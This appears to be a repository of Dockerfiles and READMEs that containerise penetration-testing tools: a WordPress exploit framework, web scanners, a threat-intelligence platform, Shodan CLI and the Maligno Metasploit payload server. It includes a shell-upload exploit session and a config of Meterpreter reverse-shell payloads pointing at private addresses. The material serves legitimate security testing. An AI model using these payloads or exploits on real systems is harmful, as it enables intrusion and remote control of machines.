├── README.md ├── WPExploitFramework ├── Dockerfile └── README.md ├── golismero ├── Dockerfile └── README.md ├── gosint ├── Dockerfile ├── README.md ├── default.conf └── gosint.sh ├── joomlavs ├── Dockerfile └── README.md ├── maligno ├── Dockerfile ├── README.md └── server_config.xml └── shodan ├── Dockerfile └── README.md /README.md: -------------------------------------------------------------------------------- 1 | # DockerFiles 2 | 3 | DockerFiles for Docker Containers 4 | -------------------------------------------------------------------------------- /WPExploitFramework/Dockerfile: -------------------------------------------------------------------------------- 1 | # Run Wordpress Exploit Framework in a Docker Container 2 | 3 | FROM ruby:2.2 4 | 5 | MAINTAINER Jason Soto "www.jasonsoto.com" 6 | 7 | ENV DEBIAN_FRONTEND noninteractive 8 | 9 | # Clone Project Repo 10 | 11 | RUN git clone https://github.com/rastating/wordpress-exploit-framework 12 | 13 | WORKDIR wordpress-exploit-framework/ 14 | 15 | RUN bundle install 16 | 17 | CMD ["ruby","wpxf.rb"] 18 | -------------------------------------------------------------------------------- /WPExploitFramework/README.md: -------------------------------------------------------------------------------- 1 | ### Wordpress Exploit Framework Docker Container 2 | 3 | ================================================== 4 | 5 | Wordpress Exploit Framework is Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems. 6 | 7 | ***Usage Examples:*** 8 | 9 | ``` 10 | wpxf > use exploit/symposium_shell_upload 11 | 12 | [+] Loaded module: # 13 | 14 | wpxf [exploit/symposium_shell_upload] > set host wp-sandbox 15 | 16 | [+] Set host => wp-sandbox 17 | 18 | wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ 19 | 20 | [+] Set target_uri => /wordpress/ 21 | 22 | wpxf [exploit/symposium_shell_upload] > set payload exec 23 | 24 | [+] Loaded payload: # 25 | 26 | wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!" 27 | 28 | [+] Set cmd => echo "Hello, world!" 29 | 30 | wpxf [exploit/symposium_shell_upload] > run 31 | 32 | [-] Preparing payload... 33 | [-] Uploading the payload... 34 | [-] Executing the payload... 35 | [+] Result: Hello, world! 36 | [+] Execution finished successfully 37 | ``` 38 | # To Run the Container 39 | 40 | ``` 41 | # docker run jsitech/wpexploitframework 42 | ``` 43 | -------------------------------------------------------------------------------- /golismero/Dockerfile: -------------------------------------------------------------------------------- 1 | # Golismero Docker Container 2 | # 3 | # 4 | # GoLismero is an open source framework for security testing 5 | 6 | FROM python:2.7.11 7 | 8 | MAINTAINER Jason Soto "www.jasonsoto.com" 9 | 10 | ENV DEBIAN_FRONTEND noninteractive 11 | 12 | RUN apt-get update; apt-get -y install git \ 13 | perl \ 14 | nmap \ 15 | sslscan \ 16 | apache2 17 | 18 | # Clone Project Repo 19 | 20 | RUN git clone https://github.com/golismero/golismero /opt/golismero 21 | 22 | WORKDIR /opt/golismero 23 | 24 | RUN pip install -r requirements.txt 25 | 26 | RUN pip install -r requirements_unix.txt 27 | 28 | RUN ln -s /opt/golismero/golismero.py /usr/bin/golismero 29 | 30 | ENTRYPOINT ["golismero"] 31 | -------------------------------------------------------------------------------- /golismero/README.md: -------------------------------------------------------------------------------- 1 | ### Golismero Docker Container 2 | ======================================= 3 | GoLismero is an open source framework for security testing. It's currently geared towards web security, but it can easily be expanded to other kinds of scans. 4 | 5 | ***The most interesting features of the framework are:*** 6 | 7 | * Real platform independence. Tested on Windows, Linux, BSD and OS X. 8 | * No native library dependencies. All of the framework has been written in pure Python. 9 | * Good performance when compared with other frameworks written in Python and other scripting languages. 10 | * Very easy to use. 11 | * Plugin development is extremely simple. 12 | * The framework also collects and unifies the results of well known tools: sqlmap, xsser, openvas, dnsrecon, theharvester... 13 | * Integration with standards: CWE, CVE and OWASP. 14 | 15 | ***To run the container*** 16 | 17 | ``` 18 | docker run jsitech/golismero COMMAND [Target] [options] 19 | ``` 20 | 21 | ***Examples*** 22 | 23 | ``` 24 | docker run jsitech/golismero scan test.com 25 | ``` 26 | ***Override Entrypoint*** 27 | 28 | ``` 29 | docker run --entrypoint /bin/bash jsitech/golismero 30 | ``` 31 | 32 | For more information and more usage examples visit the proyects page 33 | 34 | https://github.com/golismero/golismero 35 | -------------------------------------------------------------------------------- /gosint/Dockerfile: -------------------------------------------------------------------------------- 1 | # GOSINT DockerFile 2 | # 3 | # VERSION 1.0 4 | 5 | FROM golang:1.8 6 | 7 | MAINTAINER "Jason Soto " 8 | 9 | #Install Dependencies 10 | 11 | RUN apt-get update && \ 12 | apt-get -y install wget nginx mongodb php5-fpm nginx git 13 | 14 | # Create SSL Certs for Nginx 15 | RUN mkdir /etc/nginx/ssl \ 16 | && openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/nginx/ssl/nginx.key -out /etc/nginx/ssl/nginx.crt -subj "/C=US/ST=NY/L=NY/O=IT/OU=IT/CN=ssl.gosint" 17 | 18 | #Add config file for nginx 19 | ADD default.conf /etc/nginx/sites-available/default 20 | 21 | RUN go get github.com/tools/godep \ 22 | && go install github.com/tools/godep 23 | 24 | WORKDIR /go/src/ 25 | 26 | #Clone GOSINT Repository 27 | 28 | RUN git clone https://github.com/ciscocsirt/GOSINT 29 | 30 | WORKDIR /go/src/GOSINT/ 31 | 32 | COPY gosint.sh gosint.sh 33 | RUN chmod 655 gosint.sh 34 | 35 | RUN go build -o gosint \ 36 | && chmod +x gosint 37 | 38 | RUN mkdir /var/www/gosint \ 39 | && cp -r website/* /var/www/gosint/ \ 40 | && chown -R www-data:www-data /var/www/gosint/ 41 | 42 | #start gosint 43 | 44 | CMD ["./gosint.sh"] 45 | -------------------------------------------------------------------------------- /gosint/README.md: -------------------------------------------------------------------------------- 1 | ### GOSINT - Open Source Threat Intelligence Gathering and Processing Framework 2 | ===================================== 3 | 4 | The ***GOSINT*** framework is a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence. Applying threat intelligence to security operations enriches alert data with additional confidence, context, and co-occurrence. This means that you apply research from third parties to security event data to identify similar, or identical, indicators of malicious behavior. The framework is written in Go with a JavaScript frontend. 5 | 6 | 7 | ***Quick Start*** 8 | ========================= 9 | ``` 10 | docker run -i -t -p 443:443 jsitech/gosint 11 | ``` 12 | 13 | ***Set Volume for Persistent Data*** 14 | ========================= 15 | ``` 16 | docker run -i -t -p 443:443 -v /your/persistent/data/path:/var/lib/mongodb jsitech/gosint 17 | ``` 18 | 19 | 20 | 21 | More info on GOSINT Project, Head over to https://github.com/ciscocsirt/gosint 22 | -------------------------------------------------------------------------------- /gosint/default.conf: -------------------------------------------------------------------------------- 1 | server { 2 | ssl_certificate /etc/nginx/ssl/nginx.crt; 3 | ssl_certificate_key /etc/nginx/ssl/nginx.key; 4 | listen 443 ssl; 5 | 6 | root /var/www/gosint; 7 | index index.php index.html index.htm; 8 | try_files $uri $uri/ @apachesite; 9 | 10 | server_name localhost; 11 | 12 | gzip on; 13 | gzip_proxied any; 14 | gzip_types 15 | text/css 16 | text/javascript 17 | text/xml 18 | text/plain 19 | application/javascript 20 | application/x-javascript 21 | application/json; 22 | 23 | #location / { 24 | # try_files $uri $uri/ =404; 25 | #} 26 | 27 | error_page 404 /404.html; 28 | error_page 500 502 503 504 /50x.html; 29 | location = /50x.html { 30 | root /usr/share/nginx/html; 31 | } 32 | 33 | location @apachesite { 34 | auth_basic "closed site"; 35 | auth_basic_user_file /etc/nginx/.htpasswd; 36 | 37 | proxy_pass http://localhost:8000; 38 | proxy_set_header Host $host; 39 | proxy_set_header X-Real-IP $remote_addr; 40 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 41 | proxy_set_header X-Forwarded-Proto $scheme; 42 | add_header Front-End-Https on; 43 | proxy_redirect off; 44 | } 45 | 46 | location ~ \.php$ { 47 | auth_basic "closed site"; 48 | auth_basic_user_file /etc/nginx/.htpasswd; 49 | try_files $uri =404; 50 | fastcgi_split_path_info ^(.+\.php)(/.+)$; 51 | # fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; 52 | fastcgi_pass unix:/run/php5-fpm.sock; 53 | fastcgi_index index.php; 54 | fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; 55 | include fastcgi_params; 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /gosint/gosint.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | 3 | #Start Service 4 | 5 | /etc/init.d/nginx start 6 | /etc/init.d/mongodb start 7 | /etc/init.d/php5-fpm start 8 | 9 | #create user for UI Access 10 | 11 | touch /etc/nginx/.htpasswd 12 | 13 | echo -e "We will now create Credentials to access the Gosint UI" 14 | 15 | echo -n "Type a username: "; read username 16 | echo -n "Type a Password: "; read password 17 | 18 | echo $username:$(openssl passwd -crypt $password) >> /etc/nginx/.htpasswd 19 | 20 | #run Gosint 21 | 22 | /go/src/GOSINT/gosint 23 | -------------------------------------------------------------------------------- /joomlavs/Dockerfile: -------------------------------------------------------------------------------- 1 | # Run Joomla Vulnerability Scanner in a Docker Container 2 | # 3 | # 4 | # A black box, Ruby powered, Joomla vulnerability scanner 5 | 6 | FROM ruby:2.2 7 | 8 | MAINTAINER Jason Soto "www.jasonsoto.com" 9 | 10 | ENV DEBIAN_FRONTEND noninteractive 11 | 12 | # Clone Project Repo 13 | 14 | RUN git clone https://github.com/rastating/joomlavs 15 | 16 | WORKDIR joomlavs/ 17 | 18 | RUN bundle install 19 | 20 | ENTRYPOINT ["ruby","joomlavs.rb"] 21 | -------------------------------------------------------------------------------- /joomlavs/README.md: -------------------------------------------------------------------------------- 1 | ### Joomla Vulnerability Scanner Docker Container 2 | 3 | ================================================== 4 | 5 | ***JoomlaVS*** is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic finger printing and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself. 6 | 7 | Pass the options while launching the Container 8 | 9 | ***Available Options:*** 10 | 11 | ``` 12 | Basic options 13 | -u, --url The Joomla URL/domain to scan. 14 | --basic-auth The basic HTTP authentication credentials 15 | -v, --verbose Enable verbose mode 16 | Enumeration options 17 | -a, --scan-all Scan for all vulnerable extensions 18 | -c, --scan-components Scan for vulnerable components 19 | -m, --scan-modules Scan for vulnerable modules 20 | -t, --scan-templates Scan for vulnerable templates 21 | -q, --quiet Scan using only passive methods 22 | Advanced options 23 | --follow-redirection Automatically follow redirections 24 | --no-colour Disable colours in output 25 | --proxy <[protocol://]host:port> HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given, HTTP will be used 26 | --proxy-auth The proxy authentication credentials 27 | --threads The number of threads to use when multi-threading requests 28 | --user-agent The user agent string to send with all requests 29 | 30 | ``` 31 | 32 | ***Example:*** 33 | 34 | ``` 35 | docker run -it jsitech/joomlavs -u jsitech.com --scan-all --follow-redirection 36 | 37 | ``` 38 | ***Override Entrypoint*** 39 | 40 | ``` 41 | docker run -it --entrypoint /bin/bash jsitech/joomlavs 42 | ``` 43 | 44 | JoomlaVS Project URL: https://github.com/rastating/joomlavs 45 | -------------------------------------------------------------------------------- /maligno/Dockerfile: -------------------------------------------------------------------------------- 1 | #Docker Container With Maligno, Metasploit Payload Server 2 | 3 | #Use Kali Linux Official Docker image 4 | 5 | FROM kalilinux/kali-linux-docker 6 | 7 | MAINTAINER Jason Soto "www.jasonsoto.com" 8 | 9 | ENV DEBIAN_FRONTEND noninteractive 10 | 11 | EXPOSE 443 22 12 | 13 | #Updates Repo and installs Maligno Dependencies 14 | RUN apt-get update; apt-get -y --force-yes install openssl ; apt-get -y install python-ipcalc; apt-get install python-crypto 15 | 16 | #Installs OpenSSH 17 | RUN apt-get -y install openssh-server 18 | 19 | #Installs Metasploit Framework 20 | RUN apt-get -y install metasploit-framework 21 | 22 | #Downloads And install Maligno Server 23 | RUN wget --no-check-certificate http://www.encripto.no/tools/maligno-2.5.tar.gz 24 | RUN tar xzvf maligno-2.5.tar.gz; cd maligno-2.5/; ./install.sh 25 | 26 | #Adds config XML with correct metasploit Path 27 | ADD ./server_config.xml /maligno-2.5/server_config.xml 28 | -------------------------------------------------------------------------------- /maligno/README.md: -------------------------------------------------------------------------------- 1 | ### Maligno Metasploit Payload Server 2 | ===================================== 3 | 4 | ***Maligno*** is an open source penetration testing tool written in Python that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded prior to transmission. 5 | 6 | Maligno also comes with a client tool, which supports HTTP, HTTPS and encryption capabilities. The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine. 7 | 8 | The client-server communications can be configured in a way that allows you to simulate specific C&C communications or targeted attacks. In other words, the tool can be used as part of adversary replication engagements. 9 | 10 | 11 | Maligno https://www.encripto.no/ 12 | 13 | ***Quick Start*** 14 | ========================= 15 | ``` 16 | docker run -i -t -p 443:443 2022:22 jsitech/maligno /bin/bash 17 | ``` 18 | 19 | ***Share Directory for client file access*** 20 | ========================= 21 | ``` 22 | docker run -i -t -p 443:443 -p 2022:22 -v /root/clients:/maligno-2.5/clients jsitech/maligno /bin/bash 23 | ``` 24 | 25 | ***Maligno Configuration*** 26 | ========================= 27 | Configure Payloads, IP and port in server_config.xml 28 | -------------------------------------------------------------------------------- /maligno/server_config.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | /usr/share/metasploit-framework/ 5 | msfcache 6 | msfresources 7 | 8 | 0 9 | windows/meterpreter/reverse_http 10 | 192.168.1.1 11 | 4444 12 | x86/shikata_ga_nai 13 | \x00 14 | 1 15 | true 16 | 17 | 18 | 1 19 | windows/meterpreter/reverse_https 20 | 192.168.1.2 21 | 4444 22 | x86/shikata_ga_nai 23 | \x00 24 | 1 25 | false 26 | 27 | 28 | 2 29 | python/meterpreter/reverse_tcp 30 | 192.168.1.1 31 | 4445 32 | x86/shikata_ga_nai 33 | 0 34 | 1 35 | false 36 | 37 | 38 | failsafe 39 | windows/meterpreter/reverse_https_proxy 40 | 192.168.1.1 41 | 4443 42 | x86/shikata_ga_nai 43 | 0 44 | 1 45 | true 46 | 47 | 48 | 49 | 192.168.1.0/24 50 | 127.0.0.1 51 | 52 | 53 | true 54 | 192.168.1.1 55 | 443 56 | true 57 | ./certs/server.pem 58 | false 59 | 8080 60 | false 61 | ./profiles/standard.xml 62 | 63 | 64 | -------------------------------------------------------------------------------- /shodan/Dockerfile: -------------------------------------------------------------------------------- 1 | # Shodan cli Docker Container 2 | 3 | FROM ubuntu:14.04 4 | 5 | MAINTAINER Jason Soto "www.jasonsoto.com" 6 | 7 | ENV DEBIAN_FRONTEND noninteractive 8 | 9 | RUN apt-get update ; apt-get -y install python-pip \ 10 | python-dev 11 | 12 | RUN pip install shodan 13 | 14 | ENTRYPOINT ["/bin/bash"] 15 | -------------------------------------------------------------------------------- /shodan/README.md: -------------------------------------------------------------------------------- 1 | ### Shodan CLI Docker Container 2 | ================================ 3 | 4 | Shodan is a search engine for Internet-connected devices 5 | 6 | ***To run the container*** 7 | 8 | ``` 9 | docker run -it jsitech/shodan 10 | ``` 11 | 12 | ***For usage options see:*** 13 | 14 | https://cli.shodan.io/ 15 | --------------------------------------------------------------------------------